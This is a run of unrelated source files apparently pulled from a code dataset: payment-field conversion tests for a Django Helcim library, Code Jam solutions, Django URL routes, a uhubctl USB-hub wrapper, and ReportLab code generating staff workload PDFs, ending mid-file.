conversions.Field('transaction_date', 'd'),\n 'time': conversions.Field('transaction_time', 't')\n}\n\nclass InvalidField():\n def __init__(self, field_name, field_type):\n self.field_name = field_name\n self.field_type = field_type\n\nMOCK_FROM_FIELDS_INVALID = {\n 'invalid': InvalidField('field', 'x')\n}\n\ndef test__field__invalid_type():\n \"\"\"Confirms object handling of an invalid field type.\"\"\"\n try:\n conversions.Field('invalid', 'x')\n except ValueError as error:\n assert str(error) == \"Invalid field type provided for invalid: x\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_valid():\n \"\"\"Confirms handling of string request field.\"\"\"\n details = {\n 'cc_cvv': '123'\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'cc_cvv' in cleaned\n assert cleaned['cc_cvv'] == details['cc_cvv']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_min_invalid():\n \"\"\"Confirms handling of string minimum length validation.\"\"\"\n details = {\n 'cc_cvv': '12'\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"cc_cvv field length too short.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_STRING)\ndef test__validate_request_fields__string_max_invalid():\n \"\"\"Confirms handling of string maximum length validation.\"\"\"\n details = {\n 'cc_cvv': '12345'\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"cc_cvv field length too long.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_valid():\n \"\"\"Confirms handling of integer request field.\"\"\"\n details = {\n 'product_id': 100\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'product_id' in cleaned\n assert cleaned['product_id'] == details['product_id']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_min():\n \"\"\"Confirms handling of integer minimum value validation.\"\"\"\n details = {\n 'product_id': 0\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"product_id field value too small.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INTEGER)\ndef test__validate_request_fields__integer_max():\n \"\"\"Confirms handling of integer maximum value validation.\"\"\"\n details = {\n 'product_id': 101\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"product_id field value too large.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_valid():\n \"\"\"Confirms handling of decimal request field.\"\"\"\n details = {\n 'amount': Decimal('50.00')\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'amount' in cleaned\n assert cleaned['amount'] == details['amount']\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_min():\n \"\"\"Confirms handling of decimal minimum value validation.\"\"\"\n details = {\n 'amount': Decimal('1.00')\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"amount field value too small.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_DECIMAL)\ndef test__validate_request_fields__decimal_max():\n \"\"\"Confirms handling of decimal minimum value validation.\"\"\"\n details = {\n 'amount': Decimal('200.00')\n }\n\n try:\n conversions.validate_request_fields(details)\n except ValueError as error:\n assert str(error) == \"amount field value too large.\"\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_BOOLEAN)\ndef test__validate_request_fields__boolean_true():\n \"\"\"Confirms handling of True boolean request field.\"\"\"\n details = {\n 'test': True\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'test' in cleaned\n assert cleaned['test'] == 1\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_BOOLEAN)\ndef test__validate_request_fields__boolean_false():\n \"\"\"Confirms handling of False boolean request field.\"\"\"\n details = {\n 'test': False\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'test' in cleaned\n assert cleaned['test'] == 0\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_ALL)\ndef test__validate_request_fields__all_valid():\n \"\"\"Tests that validations works for all fields at once.\"\"\"\n details = {\n 'cc_cvv': '123',\n 'product_id': 100,\n 'amount': Decimal('50.00'),\n 'test': True,\n }\n\n cleaned = conversions.validate_request_fields(details)\n\n assert 'cc_cvv' in cleaned\n assert cleaned['cc_cvv'] == details['cc_cvv']\n assert 'product_id' in cleaned\n assert cleaned['product_id'] == details['product_id']\n assert 'amount' in cleaned\n assert cleaned['amount'] == details['amount']\n assert 'test' in cleaned\n assert cleaned['test'] == 1\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_ALL)\ndef test__validate_request_fields__invalid_field_name():\n \"\"\"Confirms handling when an invalid field name provide.\"\"\"\n details = {'invalid': 'field'}\n\n try:\n conversions.validate_request_fields(details)\n except KeyError:\n assert True\n else:\n assert False\n\n@patch('helcim.conversions.TO_API_FIELDS', MOCK_TO_FIELDS_INVALID)\ndef test__validate_request_fields__invalid_field_type():\n \"\"\"Tests that error is generated if invalid field type is passed.\"\"\"\n details = {'invalid': 'field'}\n\n try:\n conversions.validate_request_fields(details)\n except UnboundLocalError as error:\n assert str(error) == (\n \"local variable 'cleaned_value' referenced before assignment\"\n )\n else:\n assert False\n\ndef test__process_request_fields__valid():\n \"\"\"Confirms handling of Python data to Helcim API data.\"\"\"\n api = {\n 'account_id': '1',\n 'token': '2',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n additional = {\n 'transactionType': 'purchase',\n }\n\n data = conversions.process_request_fields(api, cleaned, additional)\n\n assert 'accountId' in data\n assert 'apiToken' in data\n assert 'terminalId' in data\n assert 'cardCVV' in data\n assert 'transactionType' in data\n assert len(data) == 5\n\ndef test__process_request_fields__valid_no_additional():\n \"\"\"Confirms handling of Python data conversion with no extra details.\"\"\"\n api = {\n 'account_id': '1',\n 'token': '2',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n\n data = conversions.process_request_fields(api, cleaned)\n\n assert 'accountId' in data\n assert 'apiToken' in data\n assert 'terminalId' in data\n assert 'cardCVV' in data\n assert len(data) == 4\n\ndef test__process_request_fields__invalid_api():\n \"\"\"Confirms handling when API details is invalid.\"\"\"\n api = {\n 'account_id': '1',\n 'terminal_id': '3',\n }\n cleaned = {\n 'cc_cvv': '100.00',\n }\n additional = {\n 'transactionType': 'purchase',\n }\n\n try:\n conversions.process_request_fields(api, cleaned, additional)\n except KeyError as error:\n assert str(error) == \"'token'\"\n else:\n assert False\n\ndef test__process_api_response__string_field():\n \"\"\"Confirms handling of an API string response field.\"\"\"\n fields = {'cardNumber': '1111********9999'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['cc_number'] == '1111********9999'\n assert isinstance(response['cc_number'], str)\n\ndef test__convert_helcim_response_string__field_none():\n \"\"\"Tests that string field can handle a None response.\"\"\"\n fields = {'cardNumber': None}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['cc_number'] is None\n\ndef test_process_api_response__decimal_field():\n \"\"\"Confirms handling of an API decimal response field.\"\"\"\n fields = {'amount': '50.01'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['amount'] == Decimal('50.01')\n assert isinstance(response['amount'], Decimal)\n\ndef test__convert_helcim_response__integer_field():\n \"\"\"Confirms handling of an API integer response field.\"\"\"\n fields = {'transactionId': '101'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_id'] == 101\n assert isinstance(response['transaction_id'], int)\n\ndef test__convert_helcim_response__boolean_field():\n \"\"\"Confirms handling of an API boolean response field.\"\"\"\n fields = {'availability': '1'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['availability'] is True\n assert isinstance(response['availability'], bool)\n\ndef test__convert_helcim_response__date_field():\n \"\"\"Confirms handling of an API date response field.\"\"\"\n fields = {'date': '2018-01-01'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_date'] == date(2018, 1, 1)\n assert isinstance(response['transaction_date'], date)\n\ndef test__convert_helcim_response__time_field():\n \"\"\"Confirms handling of an API time response field.\"\"\"\n fields = {'time': '08:30:15'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['transaction_time'] == time(8, 30, 15)\n assert isinstance(response['transaction_time'], time)\n\ndef test_process_api_response_missing_field():\n \"\"\"Confirms handling of an API response field not accounted for.\"\"\"\n fields = {'fake_field': 'fake.'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS\n )\n\n assert response['fake_field'] == 'fake.'\n assert isinstance(response['fake_field'], str)\n\ndef test__convert_helcim_response__invalid_type():\n \"\"\"Confirms handling of an invalid type for a response field.\"\"\"\n fields = {'invalid': 'field'}\n\n response = conversions.convert_helcim_response_fields(\n fields, MOCK_FROM_FIELDS_INVALID\n )\n\n assert 'invalid' in response\n assert response['invalid'] == 'field'\n\ndef test__create_f4l4():\n \"\"\"Confirms the F4L4 is returned when cc_number provided.\"\"\"\n token_f4l4 = conversions.create_f4l4('1111********9999')\n\n assert token_f4l4 == '11119999'\n\ndef test__create_f4l4__with_whitespace():\n \"\"\"Confirms the F4L4 is returned when cc_number provided.\"\"\"\n token_f4l4 = conversions.create_f4l4(' 1111********9999 ')\n\n assert token_f4l4 == '11119999'\n\ndef test__create_f4l4__no_cc():\n \"\"\"Confirms the F4L4 creation can handle a missing CC number.\"\"\"\n token_f4l4 = conversions.create_f4l4(None)\n\n assert token_f4l4 is None\n\ndef test__create_raw_response__with_data():\n \"\"\"Confirms handling when data is provided.\"\"\"\n response_data = {\n 'accountId': '123456789',\n 'token': '987654321',\n }\n\n request_string = conversions.create_raw_request(response_data)\n\n assert isinstance(request_string, str)\n assert 'accountId=123456789' in request_string\n assert 'token=987654321' in request_string\n\ndef test__create_raw_response__without_data():\n \"\"\"Confirms handling when data is not provided.\"\"\"\n response_data = None\n\n request_string = conversions.create_raw_request(response_data)\n\n assert request_string is None\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_api_response__valid():\n \"\"\"Tests handling of a valid API response.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n 'notice': 'API v2 being depreciated.',\n 'transaction': {\n 'amount': '50.01',\n 'cardNumber': '1111********9999',\n }\n }\n raw_request = {\n 'field_1': 'Field value 1',\n 'field_2': 'Field value 2',\n }\n raw_response = 'This is a raw response.'\n\n response = conversions.process_api_response(\n api_response, raw_request, raw_response\n )\n\n assert len(response) == 8\n assert response['transaction_success'] is True\n assert response['response_message'] == 'Transaction successful.'\n assert response['notice'] == 'API v2 being depreciated.'\n assert 'field_1=Field value 1' in response['raw_request']\n assert 'field_2=Field value 2' in response['raw_request']\n assert response['raw_response'] == 'This is a raw response.'\n assert response['amount'] == Decimal('50.01')\n assert response['cc_number'] == '1111********9999'\n assert response['token_f4l4'] == '11119999'\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_api_response__missing_transaction():\n \"\"\"Confirms handling of an API response when transaction field missing.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n 'notice': '',\n }\n\n response = conversions.process_api_response(api_response)\n\n assert len(response) == 5\n assert 'notice' in response\n assert 'raw_request' in response\n assert 'raw_response' in response\n assert 'response_message' in response\n assert 'transaction_success' in response\n\ndef test__process_api_response__missing_required_field():\n \"\"\"Confirms handling when a required field is missing.\"\"\"\n api_response = {\n 'response': 1,\n 'responseMessage': 'Transaction successful.',\n }\n\n try:\n conversions.process_api_response(api_response)\n except KeyError as error:\n assert str(error) == \"'notice'\"\n else:\n assert False\n\n@patch('helcim.conversions.FROM_API_FIELDS', MOCK_FROM_FIELDS)\ndef test__process_helcim_js__expected_output():\n \"\"\"Confirms output from function.\"\"\"\n api_response = {\n 'amount': '100.00',\n 'cardNumber': '1111********9999',\n }\n\n response = conversions.process_helcim_js_response(api_response)\n\n # Length of response should be 3 (cardNumber will trigger F4L4 creation)\n assert len(response) == 3\n assert 'amount' in response\n assert 'cc_number' in response\n assert 'token_f4l4' in response\n","repo_name":"studybuffalo/django-helcim","sub_path":"tests/helcim/test_conversions.py","file_name":"test_conversions.py","file_ext":"py","file_size_in_byte":16262,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23411356791","text":"outwr = ''\r\nmgf = open('magic.txt', 'r')\r\nconts = mgf.read().split('\\n')\r\nmgf.close()\r\n\r\ncases = int(conts[0])\r\nsinO = 1\r\nsinT = 6\r\nfor cn in range(cases):\r\n\tarO = [int(i) for i in conts[sinO + int(conts[sinO])].split(' ')]\r\n\tarT = [int(i) for i in conts[sinT + int(conts[sinT])].split(' ')]\r\n\tprint (arO, arT)\r\n\tbadM = False\r\n\tbadV = True\r\n\tsame = -1\r\n\tfor i in arO:\r\n\t\tfor j in arT:\r\n\t\t\tif i==j:\r\n\t\t\t\tif same != -1: badM = True\r\n\t\t\t\tbadV = False\r\n\t\t\t\tsame = i\r\n\tif badV: out = 'Volunteer cheated!'\r\n\telif badM: out = 'Bad magician!'\r\n\telse: out = str(same)\r\n\tsinO += 10\r\n\tsinT += 10\r\n\toutwr += 'Case #' + str(cn+1) + ': ' + out + '\\n'\r\n\r\noutf = open('out.txt', 'w')\r\noutf.write(outwr)\r\noutf.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1631.py","file_name":"1631.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40247614749","text":"# encoding: utf-8\nfrom schools.views import SchoolView, SchoolHomeView, SchoolCourseView, SchoolDescView, SchoolLecturerView, \\\n LecturerListView, LecturerDetailView\n\n__author__ = 'Shirlesha'\n__date__ = '2019/5/12 0009 08:02'\n\nfrom django.urls import path, re_path\n\napp_name = \"schools\"\n\nurlpatterns = [\n\n # 课程学校列表url\n path('list/', SchoolView.as_view(), name=\"school_list\"),\n\n # # 添加我要学习\n # path('add_ask/', AddUserAskView.as_view(), name=\"add_ask\"),\n\n # home页面,取纯数字\n re_path('home/(?P\\d+)/', SchoolHomeView.as_view(), name=\"school_home\"),\n\n # 访问课程\n re_path('course/(?P\\d+)/', SchoolCourseView.as_view(), name=\"school_course\"),\n\n # 访问学校描述\n re_path('desc/(?P\\d+)/', SchoolDescView.as_view(), name=\"school_desc\"),\n\n # 访问学校讲师\n re_path('school_lecturer/(?P\\d+)/', SchoolLecturerView.as_view(), name=\"school_lecturer\"),\n\n # # 学校收藏\n # path('add_fav/', AddFavView.as_view(), name=\"add_fav\"),\n\n # 讲师列表\n path('lecturer/list/', LecturerListView.as_view(), name=\"lecturer_list\"),\n\n # 访问学校讲师\n re_path('lecturer/detail/(?P\\d+)/', LecturerDetailView.as_view(), name=\"lecturer_detail\"),\n]\n","repo_name":"Shirlesha/DjangoMooc","sub_path":"mooc/apps/schools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23456769371","text":"import sys\r\n\r\ndef calc_ovation(smax, ov):\r\n\tif smax == 0:\r\n\t\treturn 0\r\n\r\n\t# find \"gaps\" that require extra people\r\n\tcur_s = 0\r\n\tinvite = 0\r\n\tfor i in xrange(smax+1):\r\n\t\tcur_ov = cur_s + invite\r\n\t\tif cur_ov < i:\r\n\t\t\tinvite += i - cur_ov\r\n\r\n\t\tcur_s += int(ov[i])\r\n\r\n\treturn invite\r\n\r\nif __name__ == '__main__':\r\n\tdata = file(sys.argv[1], \"rb\").read()\r\n\tlines = data.split('\\n')\r\n\tout = file(\"solution.dat\", \"wb\")\r\n\r\n\tfor i in xrange(int(lines[0])):\r\n\t\t(smax, ov) = lines[i+1].split(' ')\r\n\t\tout.write(\"Case #%d: %d\\n\" % (i + 1, calc_ovation(int(smax), ov)))\r\n\r\n\tout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/611.py","file_name":"611.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10503262549","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 30 09:25:59 2019\n\n@author: Maria\n\"\"\"\n\nimport csv\n\nwith open('sawtooth.txt', 'r') as in_file:\n stripped = (line.strip() for line in in_file)\n lines = (line.split(\",\") for line in stripped if line)\n with open('sawtooth.csv', 'w') as out_file:\n writer = csv.writer(out_file)\n writer.writerows(lines)","repo_name":"marialuquea/Evolutionary_Algorithm","sub_path":"results/testing/txt_to_csv.py","file_name":"txt_to_csv.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4705605206","text":"import re\nimport subprocess\nfrom typing import List, Optional\n\nUHUBCTL_BINARY = \"uhubctl\"\n\n\ndef _uhubctl(args: list = []) -> list:\n cmd = UHUBCTL_BINARY.split(\" \") + args\n result = subprocess.run(cmd, capture_output=True)\n stdout = result.stdout.decode()\n\n if result.returncode != 0:\n stderr = result.stderr.decode()\n\n raise Exception(f\"uhubctl failed: {stderr}\")\n\n return stdout.split('\\n')\n\n\ndef discover_hubs():\n \"\"\"\n Return list of all by uhubctl supported USB hubs with their ports\n\n Returns:\n List of hubs\n\n \"\"\"\n hubs = []\n\n pattern = re.compile(\"Current status for hub ([\\.\\d-]+)\")\n\n for line in _uhubctl():\n regex = pattern.match(line)\n\n if regex:\n hub = Hub(regex.group(1), enumerate=True)\n hubs.append(hub)\n\n return hubs\n\n\nclass Hub:\n def __init__(self, path: str, enumerate: bool = False) -> None:\n \"\"\"\n Create new hub instance\n\n Arguments:\n path: USB hub path identifier\n enumerate: Automatically enumerate ports\n \"\"\"\n self.path: str = path\n self.ports: List[Port] = []\n\n if enumerate:\n self.discover_ports()\n\n def add_port(self, port_number: int) -> 'Port':\n \"\"\"\n Add port to hub by port number\n\n Arguments:\n port_number: Indentification number of port\n\n Returns:\n Port\n\n \"\"\"\n port = Port(self, port_number)\n self.ports.append(port)\n\n return port\n\n def add_ports(self, port_start: int, port_end: int):\n \"\"\"\n Add multiple ports to hub\n\n Arguments:\n port_start: First port's indentification number\n port_end: Last port's ndentification number\n \"\"\"\n for port_number in range(port_start, port_end):\n self.add_port(port_number)\n\n def find_port(self, port_number: int) -> Optional['Port']:\n \"\"\"\n Find port by port number\n\n Arguments:\n port_number: Identification number of port to find\n\n Returns:\n Port or None\n \"\"\"\n\n for port in self.ports:\n if port.port_number == int(port_number):\n return port\n\n return None\n\n def discover_ports(self) -> None:\n \"\"\"\n Discover ports for this hub instance\n \"\"\"\n pattern = re.compile(\" Port (\\d+): \\d{4} (power|off)\")\n\n for line in _uhubctl([\"-l\", self.path]):\n regex = pattern.match(line)\n\n if regex:\n port = Port(self, regex.group(1))\n self.ports.append(port)\n\n def __str__(self) -> str:\n return f\"USB Hub {self.path}\"\n\n\nclass Port:\n def __init__(self, hub: Hub, port_number: int):\n \"\"\"\n Create new port instance\n\n Arguments:\n hub: Hub to attach port to\n port_number: Number of port to create\n\n \"\"\"\n self.hub = hub\n self.port_number = int(port_number)\n\n @property\n def status(self) -> bool:\n status = None\n pattern = re.compile(f\" Port {self.port_number}: \\d{{4}} (power|off)\")\n\n args = [\"-l\", self.hub.path, \"-p\", str(self.port_number)]\n for line in _uhubctl(args):\n reg = pattern.match(line)\n\n if reg:\n status = (reg.group(1) == \"power\")\n\n if status is None:\n raise Exception()\n\n return status\n\n @status.setter\n def status(self, status: bool) -> None:\n args = [\"-l\", self.hub.path, \"-p\", str(self.port_number), \"-a\"]\n\n if status:\n args.append(\"on\")\n else:\n args.append(\"off\")\n\n _uhubctl(args)\n\n def __str__(self) -> str:\n return f\"USB Port {self.hub.path}.{self.port_number}\"\n","repo_name":"nbuchwitz/action-playground","sub_path":"uhubctl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12271361949","text":"import datetime\nimport io\nimport textwrap\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.pagesizes import A4, landscape\nfrom reportlab.lib.styles import ParagraphStyle\nfrom reportlab.lib.units import inch\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table, TableStyle\n\n\nstyle_heading = ParagraphStyle(\n name=\"Normal\",\n fontName=\"Russian\",\n fontSize=24,\n alignment=1,\n spaceAfter=40,\n spaceBefore=40,\n)\nstyle_main_text = ParagraphStyle(\n name=\"Normal\", fontName=\"Russian\", fontSize=16, spaceAfter=10\n)\n\n\ndef create_person_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=A4,\n rightMargin=30,\n leftMargin=30,\n topMargin=20,\n bottomMargin=18,\n title=info[\"full_name\"],\n )\n flowables = []\n flowables.append(Paragraph(info[\"full_name\"], style=style_heading))\n flowables.append(\n Paragraph(\n f\"Дата рождения: {info['birth_date'].strftime('%d.%m.%Y') if info['birth_date'] != datetime.date.min else 'Нет' }\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\n f\"Номер телефона: {info['phone_number']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(f\"Ученая степень: {info['degree']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(\n f\"Ученое звание: {info['academic_title']}\", style=style_main_text\n )\n )\n flowables.append(\n Paragraph(f\"Должность: {info['position']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(f\"Ставка: {info['rate']}\", style=style_main_text)\n )\n flowables.append(\n Paragraph(\n f\"Нагрузка по ставке в год(час): {info['yearly_load']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\n f\"Оклад по ставке в месяц(руб.): {info['salary']}\",\n style=style_main_text,\n )\n )\n flowables.append(\n Paragraph(\"Краткая информация по нагрузке\", style=style_heading)\n )\n data = [\n [\n \"Нагрузка в\\nбакалавриате\",\n \"\",\n \"Нагрузка в\\nмагистратуре\",\n \"\",\n \"По ставке\",\n \"Фактическая\",\n ],\n [\n \"Нечетные семестры\",\n \"Четные семестры\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n ],\n [\n info[\"bachelor_odd\"],\n info[\"bachelor_even\"],\n info[\"magistrate_odd\"],\n info[\"magistrate_even\"],\n info[\"yearly_load\"],\n sum(\n [\n info[\"bachelor_odd\"],\n info[\"bachelor_even\"],\n info[\"magistrate_odd\"],\n info[\"magistrate_even\"],\n ]\n ),\n ],\n ]\n style_table_load = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 12),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"SPAN\", (0, 0), (1, 0)),\n (\"SPAN\", (2, 0), (3, 0)),\n (\"SPAN\", (4, 0), (4, 1)),\n (\"SPAN\", (5, 0), (5, 1)),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n ]\n )\n\n tbl = Table(data)\n tbl.setStyle(style_table_load)\n flowables.append(tbl)\n if info[\"subjects\"]:\n flowables.append(\n Paragraph(\"Информация по предметам\", style=style_heading)\n )\n\n style_table_subjects_params = [\n (\"FONTSIZE\", (0, 0), (-1, -1), 11),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"TOP\"),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n ]\n data = [\n [\n \"Уровень обучения\",\n \"Предмет\",\n \"Тип\\nзанятия\",\n \"Направление\",\n \"Группа\\nСеместр\",\n \"Нагрузка\",\n ]\n ]\n text_width = 15\n subjects = info[\"subjects\"]\n offset = 1\n for study_level, subject_names in subjects.items():\n for subject_name, holding_types in subject_names.items():\n for holding_type, directions in holding_types.items():\n for direction, groups in directions.items():\n data.append(\n [\n study_level,\n textwrap.fill(subject_name, text_width),\n textwrap.fill(holding_type, text_width),\n textwrap.fill(direction, 25),\n \"\\n\".join(groups),\n list(groups.values())[0],\n ]\n )\n offset += len(groups)\n data_ = list(data)\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if (\n item[2] == data[current][2]\n and item[1] == data_[current][1]\n and item[0] == data_[current][0]\n ):\n item[2] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (2, current), (2, i - 1))\n )\n current = i\n style_table_subjects_params.append((\"SPAN\", (2, current), (2, i)))\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if item[1] == data_[current][1] and item[0] == data_[current][0]:\n item[1] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (1, current), (1, i - 1))\n )\n current = i\n style_table_subjects_params.append((\"SPAN\", (1, current), (1, i)))\n\n current = 0\n for i, item in enumerate(data_[1:], 1):\n if item[0] == data_[current][0]:\n item[0] = \"\"\n else:\n style_table_subjects_params.append(\n (\"SPAN\", (0, current), (0, i - 1))\n )\n current = i\n style_table_subjects_params.append((\"SPAN\", (0, current), (0, i)))\n\n data = data_\n subjects_table = Table(data)\n style_table_subjects = TableStyle(style_table_subjects_params)\n subjects_table.setStyle(style_table_subjects)\n flowables.append(subjects_table)\n\n doc.build(flowables)\n\n return buffer\n\n\ndef create_overview_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=landscape(A4),\n rightMargin=1,\n leftMargin=1,\n topMargin=5,\n bottomMargin=5,\n title=\"Общая информация\",\n )\n\n flowables = []\n\n data = [\n [\n \"ФИО\",\n \"Дата\\nрождения\",\n \"Телефон\",\n \"Ученая\\nстепень\",\n \"Ученое\\nзвание\",\n \"Должность\",\n \"Ставка\",\n \"Нагрузка\\nпо ставке\\nв год,\\nчас\",\n \"Оклад\\nпоставке в\\nмесяц,\\nруб.\",\n \"Нагрузка в\\nбакалавриате\",\n \"\",\n \"Нагрузка в\\nмагистратуре\",\n \"\",\n ],\n [\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n \"Нечетные семестры\",\n \"Четные семестры\",\n ],\n ]\n for item in info:\n values = list(item.values())\n values[1] = values[1].replace(\" \", \"\\n\")\n values[2] = (\n values[2].strftime(\"%d.%m.%Y\")\n if values[2] != datetime.date.min\n else \"Нет\"\n )\n values[3] = \"Нет\" if not values[3] else values[3]\n data.append(values[1:8] + values[9:])\n\n style_table_overview = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 9),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (-1, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (0, 0), (0, 1)),\n (\"SPAN\", (1, 0), (1, 1)),\n (\"SPAN\", (2, 0), (2, 1)),\n (\"SPAN\", (3, 0), (3, 1)),\n (\"SPAN\", (4, 0), (4, 1)),\n (\"SPAN\", (5, 0), (5, 1)),\n (\"SPAN\", (6, 0), (6, 1)),\n (\"SPAN\", (7, 0), (7, 1)),\n (\"SPAN\", (8, 0), (8, 1)),\n (\"SPAN\", (9, 0), (10, 0)),\n (\"SPAN\", (11, 0), (12, 0)),\n ]\n )\n tbl = Table(data)\n tbl.setStyle(style_table_overview)\n flowables.append(tbl)\n\n doc.build(flowables)\n return buffer\n\n\ndef create_study_level_pdf(info: dict) -> io.BytesIO:\n buffer = io.BytesIO()\n pdfmetrics.registerFont(\n TTFont(\"Russian\", \"./static/fonts/Calibri Light.ttf\")\n )\n doc = SimpleDocTemplate(\n buffer,\n pagesize=A4,\n rightMargin=1,\n leftMargin=1,\n topMargin=5,\n bottomMargin=5,\n title=list(info.keys())[0],\n )\n flowables = []\n\n style_table = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 16),\n (\"FONTNAME\", (0, 0), (-1, -1), 